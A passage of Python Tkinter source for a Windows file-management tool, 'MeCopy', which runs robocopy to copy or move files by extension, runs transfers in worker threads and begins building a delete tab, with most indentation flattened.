Dst = win32api.GetShortPathName(Dst_Path_3.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_3").split(" ")
if parser.get("Paths_Src", "path_3") == parser.get("Paths_Dst", "path_3"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_3")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_3") == ("C:/"):
            Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen C:/ as the source path in (" + parser.get("Path_Names", "path_name_3") +
                                                "). This may cause problems: some files may not be copied, and the operation may take a long time. We recommend choosing a more specific path. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=439, y=313, width=100)
progressbar.start(10)
        Transfer_InProgress = tk.Label(
            Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transferring...")
        Transfer_InProgress.place(x=490, y=290)
if RadioValue_3.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_3_" + Move_Module_Name_3.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_3()
if RadioValue_3.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_3_" + Move_Module_Name_3.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_3()
progressbar.destroy()
        Transfer_InProgress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=340, y=309)
    except FileNotFoundError:
        Path_Error = messagebox.showwarning(
            message="Path cannot be found (" + Src + ")", title="MeCopy")
    except pywintypes.error:
        Path_Error = messagebox.showwarning(message="The source or destination path of "+parser.get(
            "Path_Names", "path_name_3")+" is misspelled or does not exist.", title="MeCopy")
    except (WindowsError, SyntaxError, ValueError, TypeError):
        pass
def Transfer_Module_4():
parser.set("Paths_Src", "path_4", Src_Path_4.get())
parser.set("Paths_Dst", "path_4", Dst_Path_4.get())
parser.set("Extensions", "Search_4", Module_4_Extensions.get())
parser.set("Path_Names", "path_name_4", Move_Module_Name_4.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_4.get())
Dst = win32api.GetShortPathName(Dst_Path_4.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_4").split(" ")
if parser.get("Paths_Src", "path_4") == parser.get("Paths_Dst", "path_4"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_4")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_4") == ("C:/"):
            Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen C:/ as the source path in (" + parser.get("Path_Names", "path_name_4") +
                                                "). This may cause problems: some files may not be copied, and the operation may take a long time. We recommend choosing a more specific path. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=439, y=429, width=100)
progressbar.start(10)
        Transfer_InProgress = tk.Label(
            Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transferring...")
        Transfer_InProgress.place(x=490, y=406)
if RadioValue_4.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_4_" + Move_Module_Name_4.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_4()
if RadioValue_4.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_4_" + Move_Module_Name_4.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_4()
progressbar.destroy()
        Transfer_InProgress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=340, y=428)
    except FileNotFoundError:
        Path_Error = messagebox.showwarning(
            message="Path cannot be found (" + Src + ")", title="MeCopy")
    except pywintypes.error:
        Path_Error = messagebox.showwarning(message="The source or destination path of "+parser.get(
            "Path_Names", "path_name_4")+" is misspelled or does not exist.", title="MeCopy")
    except (WindowsError, SyntaxError, ValueError, TypeError):
        pass
def Transfer_Module_5():
parser.set("Paths_Src", "path_5", Src_Path_5.get())
parser.set("Paths_Dst", "path_5", Dst_Path_5.get())
parser.set("Extensions", "Search_5", Module_5_Extensions.get())
parser.set("Path_Names", "path_name_5", Move_Module_Name_5.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_5.get())
Dst = win32api.GetShortPathName(Dst_Path_5.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_5").split(" ")
if parser.get("Paths_Src", "path_5") == parser.get("Paths_Dst", "path_5"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_5")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_5") == ("C:/"):
            Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen C:/ as the source path in (" + parser.get("Path_Names", "path_name_5") +
                                                "). This may cause problems: some files may not be copied, and the operation may take a long time. We recommend choosing a more specific path. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=439, y=545, width=100)
progressbar.start(10)
        Transfer_InProgress = tk.Label(
            Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transferring...")
        Transfer_InProgress.place(x=490, y=522)
if RadioValue_5.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_5_" + Move_Module_Name_5.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_5()
if RadioValue_5.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_5_" + Move_Module_Name_5.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_5()
progressbar.destroy()
        Transfer_InProgress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=340, y=545)
    except FileNotFoundError:
        Path_Error = messagebox.showwarning(
            message="Path cannot be found (" + Src + ")", title="MeCopy")
    except pywintypes.error:
        Path_Error = messagebox.showwarning(message="The source or destination path of "+parser.get(
            "Path_Names", "path_name_5")+" is misspelled or does not exist.", title="MeCopy")
    except (WindowsError, SyntaxError, ValueError, TypeError):
        pass
def Transfer_Module_6():
parser.set("Paths_Src", "path_6", Src_Path_6.get())
parser.set("Paths_Dst", "path_6", Dst_Path_6.get())
parser.set("Extensions", "Search_6", Module_6_Extensions.get())
parser.set("Path_Names", "path_name_6", Move_Module_Name_6.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_6.get())
Dst = win32api.GetShortPathName(Dst_Path_6.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_6").split(" ")
if parser.get("Paths_Src", "path_6") == parser.get("Paths_Dst", "path_6"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_6")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_6") == ("C:/"):
            Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen C:/ as the source path in (" + parser.get("Path_Names", "path_name_6") +
                                                "). This may cause problems: some files may not be copied, and the operation may take a long time. We recommend choosing a more specific path. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1027, y=82, width=100)
progressbar.start(10)
        Transfer_InProgress = tk.Label(
            Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transferring...")
        Transfer_InProgress.place(x=1080, y=60)
if RadioValue_6.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_6_" + Move_Module_Name_6.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_6()
if RadioValue_6.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_6_" + Move_Module_Name_6.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_6()
progressbar.destroy()
        Transfer_InProgress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=930, y=80)
    except FileNotFoundError:
        Path_Error = messagebox.showwarning(
            message="Path cannot be found (" + Src + ")", title="MeCopy")
    except pywintypes.error:
        Path_Error = messagebox.showwarning(message="The source or destination path of "+parser.get(
            "Path_Names", "path_name_6")+" is misspelled or does not exist.", title="MeCopy")
    except (WindowsError, SyntaxError, ValueError, TypeError):
        pass
def Transfer_Module_7():
parser.set("Paths_Src", "path_7", Src_Path_7.get())
parser.set("Paths_Dst", "path_7", Dst_Path_7.get())
parser.set("Extensions", "Search_7", Module_7_Extensions.get())
parser.set("Path_Names", "path_name_7", Move_Module_Name_7.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_7.get())
Dst = win32api.GetShortPathName(Dst_Path_7.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_7").split(" ")
if parser.get("Paths_Src", "path_7") == parser.get("Paths_Dst", "path_7"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_7")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_7") == ("C:/"):
            Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen C:/ as the source path in (" + parser.get("Path_Names", "path_name_7") +
                                                "). This may cause problems: some files may not be copied, and the operation may take a long time. We recommend choosing a more specific path. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1027, y=195, width=100)
progressbar.start(10)
        Transfer_InProgress = tk.Label(
            Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transferring...")
        Transfer_InProgress.place(x=1080, y=174)
if RadioValue_7.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_7_" + Move_Module_Name_7.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_7()
if RadioValue_7.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_7_" + Move_Module_Name_7.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_7()
progressbar.destroy()
        Transfer_InProgress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=930, y=193)
    except FileNotFoundError:
        Path_Error = messagebox.showwarning(
            message="Path cannot be found (" + Src + ")", title="MeCopy")
    except pywintypes.error:
        Path_Error = messagebox.showwarning(message="The source or destination path of "+parser.get(
            "Path_Names", "path_name_7")+" is misspelled or does not exist.", title="MeCopy")
    except (WindowsError, SyntaxError, ValueError, TypeError):
        pass
def Transfer_Module_8():
parser.set("Paths_Src", "path_8", Src_Path_8.get())
parser.set("Paths_Dst", "path_8", Dst_Path_8.get())
parser.set("Extensions", "Search_8", Module_8_Extensions.get())
parser.set("Path_Names", "path_name_8", Move_Module_Name_8.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_8.get())
Dst = win32api.GetShortPathName(Dst_Path_8.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_8").split(" ")
if parser.get("Paths_Src", "path_8") == parser.get("Paths_Dst", "path_8"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_8")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_8") == ("C:/"):
            Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen C:/ as the source path in (" + parser.get("Path_Names", "path_name_8") +
                                                "). This may cause problems: some files may not be copied, and the operation may take a long time. We recommend choosing a more specific path. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1027, y=313, width=100)
progressbar.start(10)
        Transfer_InProgress = tk.Label(
            Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transferring...")
        Transfer_InProgress.place(x=1080, y=290)
if RadioValue_8.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_8_" + Move_Module_Name_8.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_8()
if RadioValue_8.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0", "/TEE","/MOVE", r"/log:logs\Log_Move_8_" + Move_Module_Name_8.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_8()
progressbar.destroy()
        Transfer_InProgress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=930, y=309)
    except FileNotFoundError:
        Path_Error = messagebox.showwarning(
            message="Path cannot be found (" + Src + ")", title="MeCopy")
    except pywintypes.error:
        Path_Error = messagebox.showwarning(message="The source or destination path of "+parser.get(
            "Path_Names", "path_name_8")+" is misspelled or does not exist.", title="MeCopy")
    except (WindowsError, SyntaxError, ValueError, TypeError):
        pass
def Transfer_Module_9():
parser.set("Paths_Src", "path_9", Src_Path_9.get())
parser.set("Paths_Dst", "path_9", Dst_Path_9.get())
parser.set("Extensions", "Search_9", Module_9_Extensions.get())
parser.set("Path_Names", "path_name_9", Move_Module_Name_9.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_9.get())
Dst = win32api.GetShortPathName(Dst_Path_9.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_9").split(" ")
if parser.get("Paths_Src", "path_9") == parser.get("Paths_Dst", "path_9"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_9")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_9") == ("C:/"):
            Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen C:/ as the source path in (" + parser.get("Path_Names", "path_name_9") +
                                                "). This may cause problems: some files may not be copied, and the operation may take a long time. We recommend choosing a more specific path. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1027, y=429, width=100)
progressbar.start(10)
        Transfer_InProgress = tk.Label(
            Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transferring...")
        Transfer_InProgress.place(x=1080, y=406)
if RadioValue_9.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_9_" + Move_Module_Name_9.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_9()
if RadioValue_9.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_9_" + Move_Module_Name_9.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_9()
progressbar.destroy()
        Transfer_InProgress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=930, y=428)
    except FileNotFoundError:
        Path_Error = messagebox.showwarning(
            message="Path cannot be found (" + Src + ")", title="MeCopy")
    except pywintypes.error:
        Path_Error = messagebox.showwarning(message="The source or destination path of "+parser.get(
            "Path_Names", "path_name_9")+" is misspelled or does not exist.", title="MeCopy")
    except (WindowsError, SyntaxError, ValueError, TypeError):
        pass
def Transfer_Module_10():
parser.set("Paths_Src", "path_10", Src_Path_10.get())
parser.set("Paths_Dst", "path_10", Dst_Path_10.get())
parser.set("Extensions", "Search_10", Module_10_Extensions.get())
parser.set("Path_Names", "path_name_10", Move_Module_Name_10.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_10.get())
Dst = win32api.GetShortPathName(Dst_Path_10.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_10").split(" ")
if parser.get("Paths_Src", "path_10") == parser.get("Paths_Dst", "path_10"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_10")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_10") == ("C:/"):
            Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen C:/ as the source path in (" + parser.get("Path_Names", "path_name_10") +
                                                "). This may cause problems: some files may not be copied, and the operation may take a long time. We recommend choosing a more specific path. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1027, y=545, width=100)
progressbar.start(10)
        Transfer_InProgress = tk.Label(
            Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transferring...")
        Transfer_InProgress.place(x=1080, y=522)
if RadioValue_10.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_10_" + Move_Module_Name_10.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_10()
if RadioValue_10.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_10_" + Move_Module_Name_10.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_10()
progressbar.destroy()
        Transfer_InProgress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=930, y=545)
    except FileNotFoundError:
        Path_Error = messagebox.showwarning(
            message="Path cannot be found (" + Src + ")", title="MeCopy")
    except pywintypes.error:
        Path_Error = messagebox.showwarning(message="The source or destination path of "+parser.get(
            "Path_Names", "path_name_10")+" is misspelled or does not exist.", title="MeCopy")
    except (WindowsError, SyntaxError, ValueError, TypeError):
        pass
# START_MOVE_THREADS
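# Each Move_N_Thread runs Transfer_Module_N on a worker thread so robocopy
# does not block the Tk mainloop, disables Btn_Move_N and the shared btnFind5
# button while the worker runs, and polls once per second via root.after until
# the thread finishes and the buttons are re-enabled.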
def schedule_check(Patch_1_Thread):
root.after(1000, check_if_done, Patch_1_Thread)
def check_if_done(Patch_1_Thread):
if not Patch_1_Thread.is_alive():
Btn_Move_1["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check(Patch_1_Thread)
def Move_1_Thread():
Btn_Move_1["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_1_Thread = threading.Thread(target=Transfer_Module_1)
Patch_1_Thread.start()
schedule_check(Patch_1_Thread)
def schedule_check_2(Patch_2_Thread):
root.after(1000, check_if_done_2, Patch_2_Thread)
def check_if_done_2(Patch_2_Thread):
if not Patch_2_Thread.is_alive():
Btn_Move_2["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_2(Patch_2_Thread)
def Move_2_Thread():
Btn_Move_2["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_2_Thread = threading.Thread(target=Transfer_Module_2)
Patch_2_Thread.start()
schedule_check_2(Patch_2_Thread)
def schedule_check_3(Patch_3_Thread):
root.after(1000, check_if_done_3, Patch_3_Thread)
def check_if_done_3(Patch_3_Thread):
if not Patch_3_Thread.is_alive():
Btn_Move_3["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_3(Patch_3_Thread)
def Move_3_Thread():
Btn_Move_3["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_3_Thread = threading.Thread(target=Transfer_Module_3)
Patch_3_Thread.start()
schedule_check_3(Patch_3_Thread)
def schedule_check_4(Patch_4_Thread):
root.after(1000, check_if_done_4, Patch_4_Thread)
def check_if_done_4(Patch_4_Thread):
if not Patch_4_Thread.is_alive():
Btn_Move_4["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_4(Patch_4_Thread)
def Move_4_Thread():
Btn_Move_4["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_4_Thread = threading.Thread(target=Transfer_Module_4)
Patch_4_Thread.start()
schedule_check_4(Patch_4_Thread)
def schedule_check_5(Patch_5_Thread):
root.after(1000, check_if_done_5, Patch_5_Thread)
def check_if_done_5(Patch_5_Thread):
if not Patch_5_Thread.is_alive():
Btn_Move_5["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_5(Patch_5_Thread)
def Move_5_Thread():
Btn_Move_5["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_5_Thread = threading.Thread(target=Transfer_Module_5)
Patch_5_Thread.start()
schedule_check_5(Patch_5_Thread)
def schedule_check_6(Patch_6_Thread):
root.after(1000, check_if_done_6, Patch_6_Thread)
def check_if_done_6(Patch_6_Thread):
if not Patch_6_Thread.is_alive():
Btn_Move_6["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_6(Patch_6_Thread)
def Move_6_Thread():
Btn_Move_6["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_6_Thread = threading.Thread(target=Transfer_Module_6)
Patch_6_Thread.start()
schedule_check_6(Patch_6_Thread)
def schedule_check_7(Patch_7_Thread):
root.after(1000, check_if_done_7, Patch_7_Thread)
def check_if_done_7(Patch_7_Thread):
if not Patch_7_Thread.is_alive():
Btn_Move_7["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_7(Patch_7_Thread)
def Move_7_Thread():
Btn_Move_7["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_7_Thread = threading.Thread(target=Transfer_Module_7)
Patch_7_Thread.start()
schedule_check_7(Patch_7_Thread)
def schedule_check_8(Patch_8_Thread):
root.after(1000, check_if_done_8, Patch_8_Thread)
def check_if_done_8(Patch_8_Thread):
if not Patch_8_Thread.is_alive():
Btn_Move_8["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_8(Patch_8_Thread)
def Move_8_Thread():
Btn_Move_8["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_8_Thread = threading.Thread(target=Transfer_Module_8)
Patch_8_Thread.start()
schedule_check_8(Patch_8_Thread)
def schedule_check_9(Patch_9_Thread):
root.after(1000, check_if_done_9, Patch_9_Thread)
def check_if_done_9(Patch_9_Thread):
if not Patch_9_Thread.is_alive():
Btn_Move_9["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_9(Patch_9_Thread)
def Move_9_Thread():
Btn_Move_9["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_9_Thread = threading.Thread(target=Transfer_Module_9)
Patch_9_Thread.start()
schedule_check_9(Patch_9_Thread)
def schedule_check_10(Patch_10_Thread):
root.after(1000, check_if_done_10, Patch_10_Thread)
def check_if_done_10(Patch_10_Thread):
if not Patch_10_Thread.is_alive():
Btn_Move_10["state"] = "normal"
btnFind5["state"] = "normal"
else:
schedule_check_10(Patch_10_Thread)
def Move_10_Thread():
Btn_Move_10["state"] = "disabled"
btnFind5["state"] = "disabled"
Patch_10_Thread = threading.Thread(target=Transfer_Module_10)
Patch_10_Thread.start()
schedule_check_10(Patch_10_Thread)
# END_MOVE_THREADS
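# --- Illustrative sketch (hypothetical helper, not wired into the UI): the
# --- ten schedule_check_N / check_if_done_N / Move_N_Thread trios above
# --- differ only in the button they toggle and the transfer function they
# --- run, so one generic helper could replace them. `button` is assumed to be
# --- a real widget reference (not the None that .place() returns):
def Run_In_Thread(button, target):
    def Poll(worker):
        if worker.is_alive():
            # Re-check once per second without blocking the mainloop.
            root.after(1000, Poll, worker)
        else:
            button["state"] = "normal"
    button["state"] = "disabled"
    worker = threading.Thread(target=target)
    worker.start()
    Poll(worker)
# Usage (hypothetical): Run_In_Thread(Btn_Move_1, Transfer_Module_1)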
# DEL_SRC_REQUEST_START
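# Delete tab: each block below builds one module's "Search in:" path entry,
# module-name entry and extensions entry, seeded from the [Paths_Src_2],
# [Path_Names_2] and [Extensions_2] sections of config.ini.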
def Get_Src_Del_1():
Src_Del_Path_Selected = filedialog.askdirectory()
Src_Del_Path.set(Src_Del_Path_Selected)
Src_Del_Path = tk.StringVar()
Del_Extensions_1 = tk.StringVar()
Path_Name_Del_1 = tk.StringVar()
Src_Del_Path.set(parser.get("Paths_Src_2", "path_1"))
Src_Title_Del_1 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=19)
Patch_Del_Entry_1 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Src_Del_Path).place(x=155, y=22)
Button_Search_Path_Del_1 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_1).place(x=282, y=21)
Path_Name_Del_1.set(parser.get("Path_Names_2", "path_name_1"))
Del_Extensions_1.set(parser.get("Extensions_2", "Search_1"))
Entry_Path_Del_1 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_1).place(x=165, y=0)
Ext_Search_Del_1 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=0)
Entry_Del_Extensions_1 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_1).place(x=370, y=22)
def Get_Src_Del_2():
Src_Del_Path_Selected_2 = filedialog.askdirectory()
Src_Del_Path_2.set(Src_Del_Path_Selected_2)
Src_Del_Path_2 = tk.StringVar()
Del_Extensions_2 = tk.StringVar()
Path_Name_Del_2 = tk.StringVar()
Src_Del_Path_2.set(parser.get("Paths_Src_2", "path_2"))
Src_Title_Del_2 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=130)
Patch_Del_Entry_2 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_2).place(x=155, y=133)
Button_Search_Path_Del_2 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_2).place(x=282, y=132)
Path_Name_Del_2.set(parser.get("Path_Names_2", "path_name_2"))
Del_Extensions_2.set(parser.get("Extensions_2", "Search_2"))
Entry_Path_Del_2 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_2).place(x=165, y=112)
Ext_Search_Del_2 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=110)
Entry_Del_Extensions_2 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_2).place(x=370, y=133)
def Get_Src_Del_3():
Src_Del_Path_Selected_3 = filedialog.askdirectory()
Src_Del_Path_3.set(Src_Del_Path_Selected_3)
Src_Del_Path_3 = tk.StringVar()
Del_Extensions_3 = tk.StringVar()
Path_Name_Del_3 = tk.StringVar()
Src_Del_Path_3.set(parser.get("Paths_Src_2", "path_3"))
Src_Title_Del_3 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=247)
Patch_Del_Entry_3 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_3).place(x=155, y=250)
Button_Search_Path_Del_3 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_3).place(x=282, y=249)
Path_Name_Del_3.set(parser.get("Path_Names_2", "path_name_3"))
Del_Extensions_3.set(parser.get("Extensions_2", "Search_3"))
Entry_Path_Del_3 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_3).place(x=165, y=225)
Ext_Search_Del_3 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
